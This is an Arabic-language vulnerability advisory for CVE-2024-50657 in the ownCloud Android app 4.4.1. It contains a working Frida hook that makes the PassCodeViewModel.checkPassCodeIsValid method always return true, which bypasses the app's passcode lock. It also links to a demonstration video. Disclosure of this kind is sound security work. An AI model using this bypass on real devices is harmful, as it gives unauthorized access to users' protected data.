
يوفر استغلالًا لإثبات المفهوم لثغرة CVE-2024-50657، وهي ثغرة تحكم وصول غير صحيح في تطبيق Owncloud لنظام أندرويد، مما يوضح تجاوز رمز المرور عبر خطاف Frida.
مشكلة في تطبيق Owncloud android apk الإصدار 4.4.1 تسمح لمهاجم قريب جسديًا بتصعيد الصلاحيات عبر فئة PassCodeViewModel، وتحديدًا في طريقة checkPassCodeIsValid.
التحكم في الوصول غير صحيح
Owncloud
Owncloud android apk - 4.4.1
com.owncloud.android.presentation.security.passcode.PassCodeViewModel
تدير فئة PassCodeViewModel في التطبيق منطق التحقق من رمز المرور. طريقة checkPassCodeIsValid داخل هذه الفئة مسؤولة عن تحديد صلاحية رمز المرور المدخل.
يتم استخدام سكربت Frida لربط طريقة checkPassCodeIsValid في فئة PassCodeViewModel. يتم تعديل تنفيذ الطريقة لإرجاع true دائمًا، متجاوزًا التحقق الفعلي من رمز المرور.
يتم تنفيذ سكربت Frida أثناء تشغيل التطبيق. سيتم قبول أي رمز مرور يدخله المستخدم على أنه صالح، مما يسمح بالوصول غير المصرح به.
Java.perform(function() { // Locate the PassCodeViewModel class in the target application var PassCodeActivity = Java.use('com.owncloud.android.presentation.security.passcode.PassCodeViewModel');
// Hook the checkPassCodeIsValid method to modify its behavior PassCodeActivity.checkPassCodeIsValid.implementation = function(passcode) {
// Bypass the actual passcode check by always returning true return true;
};
});
رابط فيديو إثبات المفهوم : https://drive.google.com/drive/folders/1C-ZYjYhmKRGvWs9YN51XOiAS2WxxwdQd?usp=sharing
هذه الثغرة هي ثغرة تجاوز أمني من جانب العميل. تؤثر على مستخدمي التطبيق الذين يعتمدون على ميزة رمز المرور لحماية البيانات الحساسة أو تقييد الوصول إلى وظائف معينة في التطبيق. من خلال استغلال هذه الثغرة، يمكن للمهاجم تجاوز فحص رمز المرور والحصول على وصول غير مصرح به إلى أجزاء من التطبيق التي يجب حمايتها، مما قد يكشف بيانات المستخدم أو يسمح بإجراءات غير مصرح بها داخل التطبيق.